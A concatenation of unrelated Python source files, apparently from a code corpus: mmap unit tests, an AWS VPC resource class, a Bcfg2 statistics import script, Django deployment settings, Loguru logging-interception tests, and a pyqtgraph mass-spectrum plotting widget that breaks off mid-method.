m.seek(3)
self.assertEqual(m.read(3), "345")
self.assertEqual(m.tell(), 6)
# Test write()
m.seek(3)
m.write("bar")
self.assertEqual(m.tell(), 6)
self.assertEqual(m[:], "012bar6789")
m.seek(8)
self.assertRaises(ValueError, m.write, "bar")
m.close()
if os.name == 'nt':
def test_tagname(self):
data1 = "0123456789"
data2 = "abcdefghij"
assert len(data1) == len(data2)
# Test same tag
m1 = mmap.mmap(-1, len(data1), tagname="foo")
m1[:] = data1
m2 = mmap.mmap(-1, len(data2), tagname="foo")
m2[:] = data2
self.assertEqual(m1[:], data2)
self.assertEqual(m2[:], data2)
m2.close()
m1.close()
# Test different tag
m1 = mmap.mmap(-1, len(data1), tagname="foo")
m1[:] = data1
m2 = mmap.mmap(-1, len(data2), tagname="boo")
m2[:] = data2
self.assertEqual(m1[:], data1)
self.assertEqual(m2[:], data2)
m2.close()
m1.close()
def test_crasher_on_windows(self):
# Should not crash (Issue 1733986)
m = mmap.mmap(-1, 1000, tagname="foo")
try:
mmap.mmap(-1, 5000, tagname="foo")[:] # same tagname, but larger size
except:
pass
m.close()
# Should not crash (Issue 5385)
with open(TESTFN, "wb") as f:
f.write("x"*10)
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), 0)
f.close()
try:
m.resize(0) # will raise WindowsError
except:
pass
try:
m[:]
except:
pass
m.close()
def test_invalid_descriptor(self):
# socket file descriptors are valid, but out of range
# for _get_osfhandle, causing a crash when validating the
# parameters to _get_osfhandle.
s = socket.socket()
try:
with self.assertRaises(mmap.error):
m = mmap.mmap(s.fileno(), 10)
finally:
s.close()
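# LargeMmapTests exercises maps around the 2 GiB and 4 GiB boundaries using
# sparse files; it is skipped where the platform or filesystem lacks largefile support.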
class LargeMmapTests(unittest.TestCase):
def setUp(self):
unlink(TESTFN)
def tearDown(self):
unlink(TESTFN)
def _make_test_file(self, num_zeroes, tail):
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
requires('largefile',
'test requires %s bytes and a long time to run' % str(0x180000000))
f = open(TESTFN, 'w+b')
try:
f.seek(num_zeroes)
f.write(tail)
f.flush()
except (IOError, OverflowError):
f.close()
raise unittest.SkipTest("filesystem does not have largefile support")
return f
def test_large_offset(self):
with self._make_test_file(0x14FFFFFFF, b" ") as f:
m = mmap.mmap(f.fileno(), 0, offset=0x140000000, access=mmap.ACCESS_READ)
try:
self.assertEqual(m[0xFFFFFFF], b" ")
finally:
m.close()
def test_large_filesize(self):
with self._make_test_file(0x17FFFFFFF, b" ") as f:
m = mmap.mmap(f.fileno(), 0x10000, access=mmap.ACCESS_READ)
try:
self.assertEqual(m.size(), 0x180000000)
finally:
m.close()
# Issue 11277: mmap() with large (~4GB) sparse files crashes on OS X.
def _test_around_boundary(self, boundary):
tail = b' DEARdear '
start = boundary - len(tail) // 2
end = start + len(tail)
with self._make_test_file(start, tail) as f:
m = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
try:
self.assertEqual(m[start:end], tail)
finally:
m.close()
@unittest.skipUnless(sys.maxsize > _4G, "test cannot run on 32-bit systems")
def test_around_2GB(self):
self._test_around_boundary(_2G)
@unittest.skipUnless(sys.maxsize > _4G, "test cannot run on 32-bit systems")
def test_around_4GB(self):
self._test_around_boundary(_4G)
def test_main():
run_unittest(MmapTests, LargeMmapTests)
if __name__ == '__main__':
test_main()
|
py | 7dfac617a8cde132783c2c97e968a5a7794d556d | # Copyright 2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pcf.core.aws_resource import AWSResource
from pcf.core import State
from pcf.util import pcf_util
class VPCInstance(AWSResource):
"""
This is the implementation of Amazon's VPC resource.
"""
flavor = "vpc_instance"
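    # Maps the VPC state reported by EC2 to the generic PCF particle states.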
state_lookup = {
"available": State.running,
"pending": State.pending,
"missing": State.terminated
}
equivalent_states = {
State.running: 1,
State.stopped: 0,
State.terminated: 0
}
START_PARAMS = {
"CidrBlock",
"AmazonProvidedIpv6CidrBlock",
"InstanceTenancy"
}
UNIQUE_KEYS = ["aws_resource.custom_config.vpc_name"]
def __init__(self, particle_definition):
super(VPCInstance, self).__init__(particle_definition, "ec2")
self._set_unique_keys()
self.vpc_name = self.custom_config.get("vpc_name")
self._vpc_client = None
@property
def vpc_client(self):
"""
The VPC client. Calls _get_vpc_client to create a new client if needed
Returns:
vpc_client
"""
if not self._vpc_client:
self._vpc_client = self._get_vpc_client()
return self._vpc_client
def _get_vpc_client(self):
"""
Creates a new vpc_client
Returns:
vpc_client
"""
return self.resource.Vpc(self.vpc_id)
def _set_unique_keys(self):
"""
Logic that sets keys from state definition that are used to uniquely identify the VPC
"""
self.unique_keys = VPCInstance.UNIQUE_KEYS
def get_status(self):
"""
Calls boto3 describe_vpc using describe_vpcs().
Returns:
status or {"status":"missing"}
"""
vpc = self.client.describe_vpcs(Filters=[{"Name":"tag:PCFName","Values":[self.vpc_name]}])
if len(vpc["Vpcs"]) == 1:
return vpc["Vpcs"][0]
def _terminate(self):
"""
Calls boto3 delete_vpc()
Returns:
boto3 delete_vpc() response
"""
resp = self.client.delete_vpc(VpcId=self.vpc_id)
return resp
def _start(self):
"""
Creates vpc and adds tag for PCFName
Returns:
boto3 create_vpc() response
"""
resp = self.client.create_vpc(**pcf_util.param_filter(self.desired_state_definition,VPCInstance.START_PARAMS))
self.vpc_id = resp['Vpc'].get("VpcId")
self.current_state_definition = resp
tags = self.custom_config.get("Tags",[])
tags.append({"Key":"PCFName","Value":self.vpc_name})
self.vpc_client.create_tags(Tags=tags)
return resp
def _stop(self):
"""
Calls _terminate()
"""
return self._terminate()
def _update(self):
"""
No updates available
"""
        raise NotImplementedError
def sync_state(self):
"""
Calls get_status() and updates the current_state_definition and the state.
"""
full_status = self.get_status()
if full_status is None:
self.state = State.terminated
else:
self.state = VPCInstance.state_lookup.get(full_status["State"])
self.current_state_definition = full_status
self.vpc_id = full_status.get("VpcId")
def is_state_equivalent(self, state1, state2):
"""
Args:
state1 (State):
state2 (State):
Returns:
bool
"""
return VPCInstance.equivalent_states.get(state1) == VPCInstance.equivalent_states.get(state2)
def is_state_definition_equivalent(self):
"""
Since there is no update available for vpc this always returns True
Returns:
bool
"""
return True
|
py | 7dfac6fae33b5c720428197ad3137dcbba5d22f4 | #! /usr/bin/env python
"""
Imports statistics.xml and clients.xml files in to database backend for
new statistics engine
"""
__revision__ = '$Revision$'
import binascii
import os
import sys
try:
import Bcfg2.Server.Reports.settings
except Exception:
e = sys.exc_info()[1]
sys.stderr.write("Failed to load configuration settings. %s\n" % e)
sys.exit(1)
project_directory = os.path.dirname(Bcfg2.Server.Reports.settings.__file__)
project_name = os.path.basename(project_directory)
sys.path.append(os.path.join(project_directory, '..'))
project_module = __import__(project_name, '', '', [''])
sys.path.pop()
# Set DJANGO_SETTINGS_MODULE appropriately.
os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name
from Bcfg2.Server.Reports.reports.models import *
from lxml.etree import XML, XMLSyntaxError
from getopt import getopt, GetoptError
from datetime import datetime
from time import strptime
from django.db import connection
from Bcfg2.Server.Reports.updatefix import update_database
import logging
import Bcfg2.Logger
import platform
# Compatibility import
from Bcfg2.Bcfg2Py3k import ConfigParser
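# build_reason_kwargs turns one entry element from statistics.xml into the
# keyword arguments used to create a Reason record, decoding base64/binary
# diffs and honouring the 'sensitive' flag so sensitive file contents are
# never stored.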
def build_reason_kwargs(r_ent, encoding, logger):
binary_file = False
sensitive_file = False
if r_ent.get('sensitive') in ['true', 'True']:
sensitive_file = True
rc_diff = ''
elif r_ent.get('current_bfile', False):
binary_file = True
rc_diff = r_ent.get('current_bfile')
if len(rc_diff) > 1024 * 1024:
rc_diff = ''
elif len(rc_diff) == 0:
# No point in flagging binary if we have no data
binary_file = False
elif r_ent.get('current_bdiff', False):
rc_diff = binascii.a2b_base64(r_ent.get('current_bdiff'))
elif r_ent.get('current_diff', False):
rc_diff = r_ent.get('current_diff')
else:
rc_diff = ''
if not binary_file:
try:
rc_diff = rc_diff.decode(encoding)
except:
logger.error("Reason isn't %s encoded, cannot decode it" % encoding)
rc_diff = ''
return dict(owner=r_ent.get('owner', default=""),
current_owner=r_ent.get('current_owner', default=""),
group=r_ent.get('group', default=""),
current_group=r_ent.get('current_group', default=""),
perms=r_ent.get('perms', default=""),
current_perms=r_ent.get('current_perms', default=""),
status=r_ent.get('status', default=""),
current_status=r_ent.get('current_status', default=""),
to=r_ent.get('to', default=""),
current_to=r_ent.get('current_to', default=""),
version=r_ent.get('version', default=""),
current_version=r_ent.get('current_version', default=""),
current_exists=r_ent.get('current_exists', default="True").capitalize() == "True",
current_diff=rc_diff,
is_binary=binary_file,
is_sensitive=sensitive_file)
def load_stats(cdata, sdata, encoding, vlevel, logger, quick=False, location=''):
clients = {}
[clients.__setitem__(c.name, c) \
for c in Client.objects.all()]
pingability = {}
[pingability.__setitem__(n.get('name'), n.get('pingable', default='N')) \
for n in cdata.findall('Client')]
for node in sdata.findall('Node'):
name = node.get('name')
c_inst, created = Client.objects.get_or_create(name=name)
if vlevel > 0:
logger.info("Client %s added to db" % name)
clients[name] = c_inst
try:
pingability[name]
except KeyError:
pingability[name] = 'N'
for statistics in node.findall('Statistics'):
timestamp = datetime(*strptime(statistics.get('time'))[0:6])
ilist = Interaction.objects.filter(client=c_inst,
timestamp=timestamp)
if ilist:
current_interaction = ilist[0]
if vlevel > 0:
logger.info("Interaction for %s at %s with id %s already exists" % \
(c_inst.id, timestamp, current_interaction.id))
continue
else:
newint = Interaction(client=c_inst,
timestamp=timestamp,
state=statistics.get('state',
default="unknown"),
repo_rev_code=statistics.get('revision',
default="unknown"),
client_version=statistics.get('client_version',
default="unknown"),
goodcount=statistics.get('good',
default="0"),
totalcount=statistics.get('total',
default="0"),
server=location)
newint.save()
current_interaction = newint
if vlevel > 0:
logger.info("Interaction for %s at %s with id %s INSERTED in to db" % (c_inst.id,
timestamp, current_interaction.id))
counter_fields = {TYPE_CHOICES[0]: 0,
TYPE_CHOICES[1]: 0,
TYPE_CHOICES[2]: 0}
pattern = [('Bad/*', TYPE_CHOICES[0]),
('Extra/*', TYPE_CHOICES[2]),
('Modified/*', TYPE_CHOICES[1])]
for (xpath, type) in pattern:
for x in statistics.findall(xpath):
counter_fields[type] = counter_fields[type] + 1
kargs = build_reason_kwargs(x, encoding, logger)
try:
rr = None
try:
rr = Reason.objects.filter(**kargs)[0]
except IndexError:
rr = Reason(**kargs)
rr.save()
if vlevel > 0:
logger.info("Created reason: %s" % rr.id)
except Exception:
ex = sys.exc_info()[1]
logger.error("Failed to create reason for %s: %s" % (x.get('name'), ex))
rr = Reason(current_exists=x.get('current_exists',
default="True").capitalize() == "True")
rr.save()
entry, created = Entries.objects.get_or_create(\
name=x.get('name'), kind=x.tag)
Entries_interactions(entry=entry, reason=rr,
interaction=current_interaction,
type=type[0]).save()
if vlevel > 0:
logger.info("%s interaction created with reason id %s and entry %s" % (xpath, rr.id, entry.id))
# Update interaction counters
current_interaction.bad_entries = counter_fields[TYPE_CHOICES[0]]
current_interaction.modified_entries = counter_fields[TYPE_CHOICES[1]]
current_interaction.extra_entries = counter_fields[TYPE_CHOICES[2]]
current_interaction.save()
mperfs = []
for times in statistics.findall('OpStamps'):
for metric, value in list(times.items()):
mmatch = []
if not quick:
mmatch = Performance.objects.filter(metric=metric, value=value)
if mmatch:
mperf = mmatch[0]
else:
mperf = Performance(metric=metric, value=value)
mperf.save()
mperfs.append(mperf)
current_interaction.performance_items.add(*mperfs)
for key in list(pingability.keys()):
if key not in clients:
continue
try:
pmatch = Ping.objects.filter(client=clients[key]).order_by('-endtime')[0]
if pmatch.status == pingability[key]:
pmatch.endtime = datetime.now()
pmatch.save()
continue
except IndexError:
pass
Ping(client=clients[key], status=pingability[key],
starttime=datetime.now(),
endtime=datetime.now()).save()
if vlevel > 1:
logger.info("---------------PINGDATA SYNCED---------------------")
#Clients are consistent
if __name__ == '__main__':
from sys import argv
verb = 0
cpath = "/etc/bcfg2.conf"
    clientspath = False
statpath = False
syslog = False
try:
opts, args = getopt(argv[1:], "hvudc:s:CS", ["help",
"verbose",
"updates",
"debug",
"clients=",
"stats=",
"config=",
"syslog"])
except GetoptError:
mesg = sys.exc_info()[1]
# print help information and exit:
print("%s\nUsage:\nimportscript.py [-h] [-v] [-u] [-d] [-S] [-C bcfg2 config file] [-c clients-file] [-s statistics-file]" % (mesg))
raise SystemExit(2)
for o, a in opts:
if o in ("-h", "--help"):
print("Usage:\nimportscript.py [-h] [-v] -c <clients-file> -s <statistics-file> \n")
print("h : help; this message")
print("v : verbose; print messages on record insertion/skip")
print("u : updates; print status messages as items inserted semi-verbose")
print("d : debug; print most SQL used to manipulate database")
print("C : path to bcfg2.conf config file.")
print("c : clients.xml file")
print("s : statistics.xml file")
print("S : syslog; output to syslog")
raise SystemExit
if o in ["-C", "--config"]:
cpath = a
if o in ("-v", "--verbose"):
verb = 1
if o in ("-u", "--updates"):
verb = 2
if o in ("-d", "--debug"):
verb = 3
if o in ("-c", "--clients"):
clientspath = a
if o in ("-s", "--stats"):
statpath = a
if o in ("-S", "--syslog"):
syslog = True
logger = logging.getLogger('importscript.py')
logging.getLogger().setLevel(logging.INFO)
Bcfg2.Logger.setup_logging('importscript.py',
True,
syslog)
cf = ConfigParser.ConfigParser()
cf.read([cpath])
if not statpath:
try:
statpath = "%s/etc/statistics.xml" % cf.get('server', 'repository')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
print("Could not read bcfg2.conf; exiting")
raise SystemExit(1)
try:
statsdata = XML(open(statpath).read())
except (IOError, XMLSyntaxError):
print("StatReports: Failed to parse %s" % (statpath))
raise SystemExit(1)
try:
encoding = cf.get('components', 'encoding')
except:
encoding = 'UTF-8'
    if not clientspath:
try:
clientspath = "%s/Metadata/clients.xml" % \
cf.get('server', 'repository')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
print("Could not read bcfg2.conf; exiting")
raise SystemExit(1)
try:
clientsdata = XML(open(clientspath).read())
except (IOError, XMLSyntaxError):
print("StatReports: Failed to parse %s" % (clientspath))
raise SystemExit(1)
q = '-O3' in sys.argv
# Be sure the database is ready for new schema
update_database()
load_stats(clientsdata,
statsdata,
encoding,
verb,
logger,
quick=q,
location=platform.node())
|
py | 7dfac6fb367649f51c0236b76d508a335570ece0 | """private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from mkt.settings import CACHE_PREFIX, ES_INDEXES, KNOWN_PROXIES, LOGGING
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS = ['.allizom.org', '.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['sa_pool_key'] = 'master'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
# 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
# 'BACKEND': 'memcachepool.cache.UMemcacheCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_ALWAYS_EAGER = True
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
LOGGING['loggers'].update({
'z.task': { 'level': logging.DEBUG },
'z.redis': { 'level': logging.DEBUG },
'z.pool': { 'level': logging.ERROR },
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-landfill'
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_landfill' % v) for k, v in ES_INDEXES.items())
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = False
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
LESS_BIN = 'lessc'
STYLUS_BIN = 'stylus'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
AES_KEYS = private.AES_KEYS
TASK_USER_ID = 4757633
SERVE_TMP_PATH = False
|
py | 7dfac83e482b7ced0eb5ecf18668d3bce31f8509 | import logging
from .conftest import make_logging_logger
from loguru import logger
class InterceptHandler(logging.Handler):
def emit(self, record):
# Get corresponding Loguru level if it exists
try:
level = logger.level(record.levelname).name
except ValueError:
level = record.levelno
# Find caller from where originated the logged message
frame, depth = logging.currentframe(), 2
while frame.f_code.co_filename == logging.__file__:
frame = frame.f_back
depth += 1
logger.opt(depth=depth, exception=record.exc_info).log(level, record.getMessage())
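# InterceptHandler is the standard bridge from the stdlib logging module into
# Loguru: it maps the record's level name back to a Loguru level when one
# exists, then walks the call stack past logging's own frames so the reported
# caller (function, line, module) is the original call site.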
def test_formatting(writer):
fmt = "{name} - {file.name} - {function} - {level.name} - {level.no} - {line} - {module} - {message}"
expected = "tests.test_interception - test_interception.py - test_formatting - DEBUG - 10 - 31 - test_interception - This is the message\n"
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format=fmt)
logging_logger.debug("This is the %s", "message")
result = writer.read()
assert result == expected
def test_intercept(writer):
with make_logging_logger(None, InterceptHandler()) as logging_logger:
logging_logger.info("Nope")
logger.add(writer, format="{message}")
logging_logger.info("Test")
result = writer.read()
assert result == "Test\n"
def test_add_before_intercept(writer):
logger.add(writer, format="{message}")
with make_logging_logger(None, InterceptHandler()) as logging_logger:
logging_logger.info("Test")
result = writer.read()
assert result == "Test\n"
def test_remove_interception(writer):
h = InterceptHandler()
with make_logging_logger("foobar", h) as logging_logger:
logger.add(writer, format="{message}")
logging_logger.debug("1")
logging_logger.removeHandler(h)
logging_logger.debug("2")
result = writer.read()
assert result == "1\n"
def test_intercept_too_low(writer):
with make_logging_logger("tests.test_interception", InterceptHandler()):
logger.add(writer, format="{message}")
logging.getLogger("tests").error("Nope 1")
logging.getLogger("foobar").error("Nope 2")
result = writer.read()
assert result == ""
def test_multiple_intercept(writer):
with make_logging_logger("test_1", InterceptHandler()) as logging_logger_1:
with make_logging_logger("test_2", InterceptHandler()) as logging_logger_2:
logger.add(writer, format="{message}")
logging_logger_1.info("1")
logging_logger_2.info("2")
result = writer.read()
assert result == "1\n2\n"
def test_exception(writer):
with make_logging_logger("tests.test_interception", InterceptHandler()) as logging_logger:
logger.add(writer, format="{message}")
try:
1 / 0
except:
logging_logger.exception("Oops...")
lines = writer.read().strip().splitlines()
assert lines[0] == "Oops..."
assert lines[-1] == "ZeroDivisionError: division by zero"
assert sum(line.startswith("> ") for line in lines) == 1
def test_level_is_no(writer):
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.log(12, "Hop")
result = writer.read()
assert result == "12 - Level 12 - Hop\x1b[0m\n"
def test_level_does_not_exist(writer):
logging.addLevelName(152, "FANCY_LEVEL")
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.log(152, "Nop")
result = writer.read()
assert result == "152 - Level 152 - Nop\x1b[0m\n"
def test_level_exist_builtin(writer):
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.error("Error...")
result = writer.read()
assert result == "\x1b[31m\x1b[1m40 - ERROR - Error...\x1b[0m\n"
def test_level_exists_custom(writer):
logging.addLevelName(99, "ANOTHER_FANCY_LEVEL")
logger.level("ANOTHER_FANCY_LEVEL", no=99, color="<green>", icon="")
with make_logging_logger("tests", InterceptHandler()) as logging_logger:
logger.add(writer, format="<lvl>{level.no} - {level.name} - {message}</lvl>", colorize=True)
logging_logger.log(99, "Yep!")
result = writer.read()
assert result == "\x1b[32m99 - ANOTHER_FANCY_LEVEL - Yep!\x1b[0m\n"
def test_using_logging_function(writer):
with make_logging_logger(None, InterceptHandler()):
logger.add(writer, format="{function} {line} {module} {file.name} {message}")
logging.warning("ABC")
result = writer.read()
assert result == "test_using_logging_function 150 test_interception test_interception.py ABC\n"
|
py | 7dfac8bba23f9c83a5808d8ae4be3dee8fb6a453 | from collections import namedtuple
import numpy as np
import pyqtgraph as pg
from PyQt5.QtCore import Qt
from pyqtgraph import PlotWidget
# structure for annotation (here for reference)
PeakAnnoStruct = namedtuple(
"PeakAnnoStruct",
"mz intensity text_label \
symbol symbol_color",
)
LadderAnnoStruct = namedtuple(
"LadderAnnoStruct",
"mz_list \
text_label_list color",
)
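# Hypothetical construction examples (field values are illustrative only):
#   PeakAnnoStruct(mz=445.12, intensity=1.2e5, text_label="y5",
#                  symbol="o", symbol_color="r")
#   LadderAnnoStruct(mz_list=[100.0, 200.0], text_label_list=["b1", "b2"],
#                    color="b")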
pg.setConfigOption("background", "w") # white background
pg.setConfigOption("foreground", "k") # black peaks
class SpectrumWidget(PlotWidget):
def __init__(self, parent=None, dpi=100):
PlotWidget.__init__(self)
self.setLimits(yMin=0, xMin=0)
self.setMouseEnabled(y=False)
self.setLabel("bottom", "m/z")
self.setLabel("left", "intensity")
self.highlighted_peak_label = None
self.peak_annotations = None
self.ladder_annotations = None
# numpy arrays for fast look-up
self._mzs = np.array([])
self._ints = np.array([])
self.getViewBox().sigXRangeChanged.connect(self._autoscaleYAxis)
self.getViewBox().sigRangeChangedManually.connect(
self.redrawLadderAnnotations
) # redraw anno
self.proxy = pg.SignalProxy(
self.scene().sigMouseMoved, rateLimit=60, slot=self._onMouseMoved
)
def setSpectrum(
self, spectrum, zoomToFullRange=False
): # add a default value for displaying all peaks
self.plot(clear=True)
self.zoomToFullRange = zoomToFullRange # relevant in redrawPlot()
        # delete old highlighted "hover" peak
"""se_comment: changed != to is not"""
if self.highlighted_peak_label is not None:
self.removeItem(self.highlighted_peak_label)
self.highlighted_peak_label = None
self.spec = spectrum
self._mzs, self._ints = self.spec.get_peaks()
self._autoscaleYAxis()
# for annotation in ControllerWidget
self.minMZ = np.amin(self._mzs)
self.maxMZ = np.amax(self._mzs)
self.redrawPlot()
def setPeakAnnotations(self, p_annotations):
self.peak_annotation_list = p_annotations
def setLadderAnnotations(self, ladder_visible=[]):
self._ladder_visible = ladder_visible # LadderAnnoStruct
def clearLadderAnnotation(self, ladder_key_to_clear):
try:
if ladder_key_to_clear in self._ladder_anno_lines.keys():
self._clear_ladder_item(ladder_key_to_clear)
except (AttributeError, NameError):
return
def redrawPlot(self):
self.plot(clear=True)
if self.zoomToFullRange:
self.setXRange(self.minMZ, self.maxMZ)
self._plot_spectrum()
self._clear_annotations()
self._plot_peak_annotations()
self._plot_ladder_annotations()
def redrawLadderAnnotations(self):
self._plot_ladder_annotations()
def _autoscaleYAxis(self):
x_range = self.getAxis("bottom").range
if x_range == [
0,
1,
]: # workaround for axis sometimes not being set
            # TODO: check if this is resolved
x_range = [np.amin(self._mzs), np.amax(self._mzs)]
self.currMaxY = self._getMaxIntensityInRange(x_range)
if self.currMaxY:
self.setYRange(0, self.currMaxY, update=False)
def _plot_peak_annotations(self):
try:
self.peak_annotation_list
except (AttributeError, NameError):
return
if self.peak_annotation_list is not None:
for item in self.peak_annotation_list: # item : PeakAnnoStruct
self.plot(
[item.mz],
[item.intensity],
symbol=item.symbol,
symbolBrush=pg.mkBrush(item.symbol_color),
symbolSize=14,
)
if item.text_label:
label = pg.TextItem(
text=item.text_label, color=item.symbol_color, anchor=(
0.5, 1)
)
self.addItem(label)
label.setPos(item.mz, item.intensity)
def _getMaxIntensityInRange(self, xrange):
left = np.searchsorted(self._mzs, xrange[0], side="left")
right = np.searchsorted(self._mzs, xrange[1], side="right")
return np.amax(self._ints[left:right], initial=1)
def _plot_spectrum(self):
bargraph = pg.BarGraphItem(x=self._mzs, height=self._ints, width=0)
self.addItem(bargraph)
def _plot_ladder_annotations(self):
try:
self._ladder_visible
except (AttributeError, NameError):
return
try:
self.currMaxY
except (AttributeError, NameError):
self.currMaxY = self._getMaxIntensityInRange(
self.getAxis("bottom").range)
xlimit = [self._mzs[0], self._mzs[-1]]
for ladder_key, lastruct in self._ladder_visible.items():
if ladder_key in self._ladder_anno_lines.keys(): # update
self._ladder_anno_lines[ladder_key][0].setData(
[xlimit[0], xlimit[1]], [self.currMaxY, self.currMaxY]
) # horizontal line
cntr = 0
for x in lastruct.mz_list:
self._ladder_anno_lines[ladder_key][cntr + 1].setData(
[x, x], [0, self.currMaxY]
)
self._ladder_anno_labels[ladder_key][cntr].setPos(
x, self.currMaxY
) # horizon line doesn't have label
cntr += 1
else: # plot
pen = pg.mkPen(lastruct.color, width=2, style=Qt.DotLine)
self._ladder_anno_lines[ladder_key] = []
self._ladder_anno_labels[ladder_key] = []
self._ladder_anno_lines[ladder_key].append(
# horizon line. index 0
self.plot(
[xlimit[0], xlimit[1]], [
self.currMaxY, self.currMaxY], pen=pen
)
)
"""se_comment: hard-refactor to comply to pep8"""
z = zip(lastruct.mz_list, lastruct.text_label_list)
for x, txt_label in z:
self._ladder_anno_lines[ladder_key].append(
self.plot([x, x], [0, self.currMaxY], pen=pen)
)
label = pg.TextItem(
text=txt_label, color=lastruct.color, anchor=(1, -1)
)
label.setPos(x, self.currMaxY)
label.setParentItem(
self._ladder_anno_lines[ladder_key][-1])
self._ladder_anno_labels[ladder_key].append(label)
def _clear_annotations(self):
self._ladder_visible = dict()
self._ladder_anno_lines = dict()
self._ladder_anno_labels = dict()
def _clear_peak_annotations(self):
self.peak_annotation_list = None
def _clear_ladder_item(self, key):
for anno in self._ladder_anno_lines[key]:
anno.clear()
for pos in self._ladder_anno_labels[key]:
pos.setPos(0, 0)
del self._ladder_anno_lines[key]
del self._ladder_anno_labels[key]
def _onMouseMoved(self, evt):
pos = evt[0] # using signal proxy
# turns original arguments into a tuple
if self.sceneBoundingRect().contains(pos):
mouse_point = self.getViewBox().mapSceneToView(pos)
